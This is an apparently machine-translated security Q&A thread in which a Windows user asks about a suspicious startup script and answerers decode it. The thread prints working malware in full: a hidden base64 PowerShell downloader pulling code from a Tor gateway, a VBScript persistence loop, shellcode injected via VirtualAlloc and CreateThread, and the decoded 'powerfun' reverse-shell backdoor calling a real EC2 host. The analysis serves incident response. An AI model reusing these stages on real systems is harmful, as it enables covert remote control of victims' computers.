Código extraño que se ejecuta al inicio

Question

Código extraño que se ejecuta al inicio

#1 de VincBreaker (106 votos)
#2 de mdeous (43 votos)
#3 de SecretSasquatch (10 votos)

72

Se estaba ejecutando un fragmento de código en mi máquina Windows al inicio. Me gustaría saber exactamente qué está haciendo este código; parece referirse a algo como crackbook?

@echo off  
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) 
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )

EDIT : he intentado formatear mi PC. Parece que se instaló un programa espía de prpops.com (NSFW) en mi sistema sin previo aviso.

El archivo de configuración que solía iniciar en mi PC sigue ahí incluso después de formatear mi PC. Aquí hay un pequeño código que se ejecuta a través del cual se ejecutó el archivo bat anterior.

Dim WinScriptHost 
WScript.Sleep(30000) 
Set WinScriptHost = CreateObject("WScript.Shell") 
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
While True 
set service = GetObject ("winmgmts:") 
running = 0 
for each Process in Service.InstancesOf ("Win32_Process") 
    If Process.Name = "powershell.exe" then 
        running = running + 1 
        End If 
next 
If running < 1 then 
    WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
    End If 
WScript.Sleep(120000) 
Wend 
Set WinScriptHost = Nothing

Indique si esto descarga automáticamente el script o lo almacena de alguna manera en la memoria?

obfuscation windows powershell

pregunta Aditya Giri 25.05.2017 - 19:02

fuente

3 respuestas

43

Versión corta

Su máquina está comprometida y el atacante aún controla su computadora.

Versión larga

Al descodificar la expresión codificada en base64 (la cadena pasada en el argumento -Enc ), obtiene el código que ejecuta PowerShell:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

Este código básicamente descarga más código de PowerShell de un servicio oculto de Tor (a través de la puerta de enlace onion.to , que permite acceder a los servicios ocultos de Tor desde una máquina que no está conectada a Tor) y lo ejecuta.

Aquí está el código que se descarga y ejecuta (una vez más, la ejecución en línea de un script PowerShell codificado en base64):

powershell -Enc [long base64 encoded string]

Que corresponde al siguiente código una vez descodificado:

$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x = $o::VirtualAlloc(0, 0x1000, 0x3000, 0x40)
[Byte[]]$sc = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73,0x68,0x65,0x6c,0x6c,0x2e,0x65,0x78,0x65,0x20,0x2d,0x65,0x78,0x65,0x63,0x20,0x62,0x79,0x70,0x61,0x73,0x73,0x20,0x2d,0x6e,0x6f,0x70,0x20,0x2d,0x57,0x20,0x68,0x69,0x64,0x64,0x65,0x6e,0x20,0x2d,0x6e,0x6f,0x6e,0x69,0x6e,0x74,0x65,0x72,0x61,0x63,0x74,0x69,0x76,0x65,0x20,0x49,0x45,0x58,0x20,0x24,0x28,0x24,0x73,0x3d,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x2c,0x5b,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x5d,0x3a,0x3a,0x46,0x72,0x6f,0x6d,0x42,0x61,0x73,0x65,0x36,0x34,0x53,0x74,0x72,0x69,0x6e,0x67,0x28,0x27,0x48,0x34,0x73,0x49,0x41,0x49,0x76,0x6d,0x79,0x56,0x67,0x43,0x41,0x36,0x56,0x57,0x62,0x57,0x2f,0x62,0x4e,0x68,0x44,0x2b,0x37,0x6c,0x39,0x78,0x63,0x4c,0x56,0x61,0x51,0x69,0x7a,0x43,0x4e,0x70,0x70,0x68,0x44,0x5a,0x42,0x69,0x72,0x70,0x4a,0x75,0x41,0x62,0x4c,0x57,0x71,0x4c,0x33,0x6c,0x67,0x32,0x45,0x67,0x74,0x48,0x53,0x4f,0x74,0x55,0x69,0x6b,0x53,0x31,0x4a,0x2b,0x57,0x65,0x4c,0x2f,0x58,0x6c,0x4b,0x69,0x58,0x68,0x77,0x6e,0x36,0x4c,0x4c,0x70,0x69,0x36,0x33,0x6a,0x33,0x63,0x50,0x6e,0x6e,0x6a,0x73,0x65,0x39,0x51,0x5a,0x47,0x66,0x49,0x4e,0x69,0x6b,0x54,0x48,0x77,0x34,0x55,0x62,0x45,0x53,0x69,0x47,0x44,0x2b,0x51,0x34,0x2b,0x36,0x70,0x39,0x4a,0x4a,0x68,0x67,0x4b,0x65,0x41,0x73,0x58,0x64,0x49,0x33,0x77,0x4f,0x78,0x58,0x52,0x72,0x74,0x58,0x53,0x6e,0x71,0x47,0x4b,0x4f,0x59,0x50,0x66,0x55,0x50,0x6b,0x33,0x4f,0x41,0x2b,0x54,0x47,0x4a,0x6d,0x43,0x31,0x6b,0x4d,0x4c,0x39,0x4f,0x4e,0x73,0x51,0x6a,0x69,0x48,0x7a,0x37,0x6a,0x78,0x76,0x38,0x7a,0x2f,0x78,0x6c,0x43,0x42,0x50,0x39,0x6d,0x74,0x38,0x44,0x4e,0x4e,0x55,0x52,0x73,0x56,0x30,0x66,0x35,0x42,0x37,0x6c,0x38,0x36,0x6b,0x7a,0x38,0x6c,0x58,0x75,0x43,0x43,0x5a,0x6f,0x6b,0x4b,0x42,0x45,0x5a,0x36,0x4a,0x61,0x61,0x4a,0x31,0x42,0x43,0x4f,0x45,0x68,0x6c,0x57,0x58,0x69,0x50,0x42,0x74,0x7a,0x76,0x79,0x78,0x45,0x50,0x62,0x47,0x35,0x62,0x53,0x74,0x37,0x57,0x76,0x4b,0x61,0x37,0x4b,0x31,0x46,0x6f,0x50,0x6b,0x4b,0x2b,0x50,0x71,0x4b,0x43,0x70,0x57,0x2f,0x79,0x66,0x6a,0x70,0x57,0x49,0x32,0x64,0x33,0x4d,0x43,0x58,0x69,0x61,0x55,0x68,0x5a,0x31,0x44,0x36,0x31,0x6a,0x6d,0x59,0x53,0x63,0x50,0x54,0x46,0x65,0x38,0x41,0x31,0x4c,0x4f,0x49,0x31,0x79,0x71,0x32,0x63,0x78,0x42,0x51,0x39,0x52,0x53,0x72,0x41,0x43,0x70,0x44,0x7a,0x4b,0x45,0x6a,0x51,0x45,0x66,0x33,0x55,0x39,0x4b,0x46,0x7a,0x69,0x42,0x62,0x6a,0x6c,0x4e,0x75,0x44,0x6a,0x4e,0x32,0x6a,0x50,0x59,0x78,0x61,0x31,0x76,0x58,0x79,0x78,0x69,0x4d,0x74,0x6a,0x6b,0x31,0x68,0x71,0x2b,0x62,0x58,0x6b,0x35,0x33,0x72,0x4c,0x6e,0x66,0x36,0x66,0x45,0x71,0x50,0x61,0x6d,0x49,0x66,0x33,0x71,0x43,0x53,0x5a,0x68,0x4b,0x74,0x72,0x36,0x7a,0x46,0x37,0x72,0x35,0x2f,0x6a,0x51,0x43,0x49,0x56,0x46,0x63,0x72,0x73,0x61,0x33,0x66,0x4f,0x56,0x32,0x32,0x4a,0x7a,0x68,0x74,0x2b,0x77,0x7a,0x44,0x45,0x6c,0x64,0x4b,0x41,0x52,0x54,0x6e,0x63,0x67,0x73,0x72,0x2b,0x4a,0x62,0x6f,0x43,0x31,0x79,0x67,0x6b,0x48,0x6a,0x4f,0x75,0x6f,0x42,0x73,0x6c,0x66,0x34,0x35,0x35,0x4d,0x4c,0x49,0x62,0x74,0x54,0x45,0x63,0x2b,0x4b,0x66,0x76,0x2f,0x50,0x37,0x50,0x37,0x2f,0x33,0x42,0x75,0x31,0x2f,0x38,0x66,0x75,0x2b,0x55,0x30,0x4a,0x55,0x76,0x65,0x61,0x61,0x57,0x53,0x4b,0x58,0x79,0x2b,0x79,0x54,0x6b,0x36,0x53,0x70,0x54,0x53,0x47,0x68,0x4b,0x2f,0x2b,0x47,0x4d,0x62,0x71,0x53,0x78,0x74,0x4c,0x73,0x6d,0x59,0x30,0x75,0x7a,0x56,0x55,0x67,0x74,0x6c,0x55,0x43,0x61,0x6d,0x72,0x77,0x4b,0x47,0x6b,0x53,0x33,0x35,0x44,0x69,0x33,0x36,0x58,0x7a,0x71,0x54,0x49,0x70,0x4b,0x46,0x6f,0x6d,0x59,0x72,0x6d,0x72,0x62,0x77,0x6a,0x58,0x53,0x6b,0x44,0x49,0x5a,0x6c,0x32,0x41,0x76,0x5a,0x49,0x4a,0x68,0x70,0x6b,0x2f,0x48,0x6a,0x6f,0x78,0x4c,0x56,0x39,0x66,0x75,0x33,0x33,0x55,0x57,0x75,0x76,0x32,0x77,0x36,0x7a,0x34,0x34,0x45,0x34,0x32,0x2b,0x42,0x35,0x39,0x4b,0x6d,0x42,0x37,0x45,0x66,0x4d,0x57,0x55,0x4b,0x77,0x78,0x51,0x71,0x48,0x67,0x52,0x68,0x31,0x54,0x68,0x58,0x7a,0x53,0x4a,0x49,0x32,0x70,0x36,0x4e,0x4b,0x42,0x4a,0x4d,0x71,0x66,0x68,0x2f,0x63,0x7a,0x7a,0x6e,0x71,0x46,0x44,0x68,0x6b,0x59,0x57,0x33,0x65,0x41,0x6d,0x61,0x43,0x6a,0x2f,0x72,0x34,0x5a,0x65,0x6f,0x79,0x6c,0x71,0x38,0x65,0x72,0x6b,0x6d,0x2b,0x70,0x4f,0x35,0x7a,0x75,0x46,0x30,0x39,0x6e,0x4d,0x4d,0x62,0x2b,0x6d,0x6e,0x58,0x75,0x45,0x44,0x48,0x72,0x36,0x65,0x66,0x7a,0x70,0x6f,0x62,0x65,0x33,0x42,0x55,0x41,0x57,0x6c,0x63,0x76,0x75,0x56,0x4f,0x46,0x57,0x45,0x57,0x51,0x68,0x6a,0x38,0x78,0x5a,0x4f,0x54,0x73,0x62,0x6a,0x6f,0x4f,0x72,0x4b,0x38,0x38,0x55,0x35,0x61,0x50,0x78,0x63,0x64,0x73,0x33,0x75,0x75,0x6e,0x35,0x52,0x68,0x59,0x54,0x5a,0x37,0x7a,0x45,0x4a,0x41,0x47,0x52,0x4d,0x61,0x61,0x39,0x51,0x55,0x75,0x57,0x53,0x64,0x33,0x34,0x62,0x54,0x67,0x42,0x42,0x39,0x6e,0x36,0x7a,0x4c,0x77,0x78,0x4d,0x7a,0x5a,0x4f,0x74,0x45,0x31,0x58,0x72,0x31,0x71,0x77,0x6d,0x56,0x57,0x4c,0x74,0x79,0x7a,0x67,0x71,0x35,0x32,0x49,0x37,0x35,0x59,0x4b,0x33,0x4d,0x43,0x44,0x51,0x61,0x39,0x2f,0x43,0x6e,0x2f,0x45,0x6f,0x65,0x43,0x53,0x4c,0x78,0x51,0x45,0x58,0x4b,0x79,0x34,0x79,0x4b,0x55,0x6d,0x4d,0x44,0x51,0x37,0x47,0x6b,0x38,0x4a,0x41,0x76,0x55,0x47,0x61,0x34,0x7a,0x49,0x4c,0x62,0x74,0x6c,0x74,0x71,0x2b,0x74,0x4a,0x73,0x53,0x4d,0x51,0x58,0x54,0x72,0x37,0x4c,0x71,0x39,0x62,0x76,0x31,0x43,0x72,0x70,0x48,0x64,0x71,0x57,0x57,0x7a,0x77,0x63,0x71,0x70,0x30,0x47,0x79,0x78,0x6f,0x77,0x35,0x37,0x6e,0x56,0x54,0x54,0x6b,0x78,0x6c,0x63,0x61,0x30,0x69,0x6a,0x6a,0x5a,0x30,0x6f,0x70,0x4f,0x4c,0x35,0x65,0x71,0x35,0x6c,0x31,0x43,0x63,0x75,0x4c,0x6d,0x6d,0x34,0x31,0x4a,0x77,0x4c,0x55,0x49,0x68,0x5a,0x4e,0x62,0x46,0x71,0x72,0x35,0x71,0x32,0x65,0x64,0x79,0x44,0x51,0x65,0x2b,0x52,0x4d,0x74,0x74,0x69,0x4a,0x70,0x5a,0x49,0x33,0x75,0x4d,0x56,0x57,0x2f,0x4e,0x37,0x39,0x43,0x2b,0x33,0x4b,0x36,0x32,0x74,0x31,0x48,0x70,0x58,0x4b,0x50,0x76,0x44,0x55,0x2f,0x73,0x71,0x4a,0x54,0x71,0x6a,0x4d,0x58,0x52,0x30,0x6e,0x58,0x4d,0x57,0x31,0x7a,0x7a,0x4d,0x4b,0x2b,0x6d,0x52,0x45,0x56,0x56,0x4c,0x62,0x65,0x31,0x38,0x36,0x50,0x7a,0x6e,0x30,0x6d,0x32,0x57,0x63,0x59,0x4b,0x75,0x36,0x38,0x54,0x35,0x47,0x53,0x6a,0x43,0x76,0x79,0x4b,0x4e,0x33,0x4b,0x4c,0x6a,0x75,0x39,0x44,0x72,0x67,0x6e,0x4d,0x51,0x35,0x34,0x48,0x50,0x45,0x48,0x70,0x48,0x74,0x62,0x30,0x30,0x39,0x44,0x47,0x61,0x36,0x46,0x52,0x65,0x75,0x76,0x7a,0x73,0x4a,0x44,0x45,0x75,0x4a,0x45,0x2f,0x78,0x30,0x71,0x5a,0x63,0x6f,0x2b,0x68,0x35,0x51,0x41,0x32,0x56,0x42,0x70,0x6f,0x64,0x61,0x4c,0x6e,0x4d,0x5a,0x54,0x72,0x67,0x78,0x4e,0x36,0x54,0x74,0x74,0x4c,0x6a,0x77,0x32,0x68,0x35,0x56,0x41,0x44,0x77,0x79,0x79,0x46,0x65,0x67,0x41,0x38,0x2b,0x76,0x4f,0x33,0x44,0x49,0x33,0x7a,0x4a,0x6c,0x46,0x2b,0x67,0x67,0x70,0x58,0x69,0x41,0x47,0x6f,0x41,0x75,0x53,0x41,0x6c,0x73,0x42,0x62,0x35,0x42,0x79,0x57,0x41,0x54,0x67,0x32,0x79,0x4e,0x55,0x51,0x63,0x46,0x49,0x4b,0x4c,0x61,0x57,0x39,0x32,0x73,0x46,0x6d,0x44,0x64,0x62,0x35,0x4f,0x77,0x67,0x53,0x70,0x63,0x4c,0x33,0x6e,0x47,0x4a,0x77,0x33,0x58,0x2f,0x54,0x42,0x33,0x37,0x61,0x4f,0x54,0x39,0x4b,0x2f,0x61,0x70,0x38,0x61,0x35,0x6f,0x64,0x48,0x70,0x39,0x6b,0x71,0x52,0x77,0x65,0x6e,0x6a,0x50,0x6d,0x55,0x5a,0x48,0x4a,0x5a,0x33,0x65,0x74,0x32,0x44,0x4e,0x72,0x62,0x4a,0x30,0x69,0x34,0x52,0x4a,0x74,0x50,0x66,0x64,0x4f,0x4f,0x46,0x56,0x2b,0x56,0x31,0x36,0x76,0x2b,0x4e,0x6d,0x6c,0x56,0x33,0x79,0x52,0x56,0x63,0x65,0x7a,0x6c,0x43,0x72,0x36,0x39,0x71,0x4d,0x77,0x41,0x2b,0x51,0x36,0x63,0x4f,0x36,0x39,0x6e,0x6c,0x77,0x6b,0x41,0x41,0x41,0x3d,0x3d,0x27,0x29,0x29,0x3b,0x49,0x45,0x58,0x20,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x47,0x7a,0x69,0x70,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x24,0x73,0x2c,0x5b,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x4d,0x6f,0x64,0x65,0x5d,0x3a,0x3a,0x44,0x65,0x63,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x29,0x29,0x29,0x2e,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x28,0x29,0x3b,0x29,0x00
for ($i=0; $i -le ($sc.Length-1); $i++) {
    $o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null
}
$z = $o::CreateThread(0, 0, $x, 0, 0, 0)
Start-Sleep -Second 100000

A mi entender, este código importa las DLL del sistema y luego ejecuta algún código nativo (la matriz de bytes largos en la línea 8).

Para seguir investigando, uno podría reconstruir el código nativo de la matriz de bytes y enviarlo a VirusTotal para tratar de identificar qué malware es, o ejecutar directamente el script de PowerShell en una caja de arena para analizar dinámicamente su comportamiento. / huelga>

~~EDITAR: Un análisis de esta última parte está disponible en Respuesta de VincBreaker .~~

respondido por el mdeous 25.05.2017 - 20:20
fuente

10

Está ejecutando un script de Powershell con un código de Powershell codificado en Base64.

Este es el código decodificado de PowerShell que se está ejecutando:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

Este script está descargando e invocando el contenido de https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq

Te dejaré seguir investigando, ya que desconfío de navegar a un enlace potencialmente malicioso. Sobre todo porque viene de * .onion.to, una dirección TOR.

respondido por el SecretSasquatch 25.05.2017 - 19:11
fuente

Lea otras preguntas en las etiquetas obfuscation windows powershell

Necesita acceder al viejo enrutador olvidado que solo admite SSLv3 ¿Las declaraciones preparadas son 100% seguras contra la inyección SQL?

score 106 · Accepted Answer

Versión corta

El atacante puede ejecutar cualquier comando de PowerShell en su máquina y se puede encontrar al obtener el propietario de " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com ".

Versión larga

Volcé la matriz binaria en un archivo y la cargué en El archivo recién lanzado me parece una etapa adicional, ya que es realmente pequeño (1.7 kb) y se ejecutará durante 10 segundos solo ya que estará vinculado a PowerShell (ya que el atacante crea un hilo en lugar de lanzarlo como un proceso separado) y la terminación se retrasa 10 segundos en el último comando.

Actualización: lamentablemente no puedo realizar ingeniería inversa en el ensamblaje, pero un vistazo rápido al archivo con un editor de texto reveló la siguiente cadena:

powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)

Sin embargo, esta etapa también utiliza GZIP como una capa de ofuscación adicional a Base64, pero aún se puede volcar a:

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient 
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun 
{ 
    Param( 
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    ) 
    Process {
    $modules = @()  
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]9999
        $listener.start()    
        $client = $listener.AcceptTcpClient()
    } 
    if ($Command -eq "reverse")
    {
    $client = New-Object  System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true") 
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com") 
        $stream = $sslStream 
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "'nCopyright (C) 2015 Microsoft Corporation. All rights reserved.'n'n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.'n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()  
    }
    $client.Close()
    $listener.Stop()
    }
}

powerfun -Command reverse -Sslcon true

Esta es una puerta trasera PowerShell bastante simple que se conecta a un servidor y luego permite que el atacante ejecute los comandos de PowerShell de forma remota en su máquina. Este script "powerfun" se puede encontrar en GitHub en Google durante dos segundos, por lo que no lo vincularé aquí para no estirar los límites antispam. Sin embargo, al compararlo con el script original, notará rápidamente que el atacante cambió la dirección del servidor remoto a " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com "y el puerto a 9999 , por lo que debería ser fácil rastrear al atacante si es necesario.

Finalmente: El servidor todavía está escuchando ese puerto, por lo que el atacante está ¡capaz de controlar tu computadora!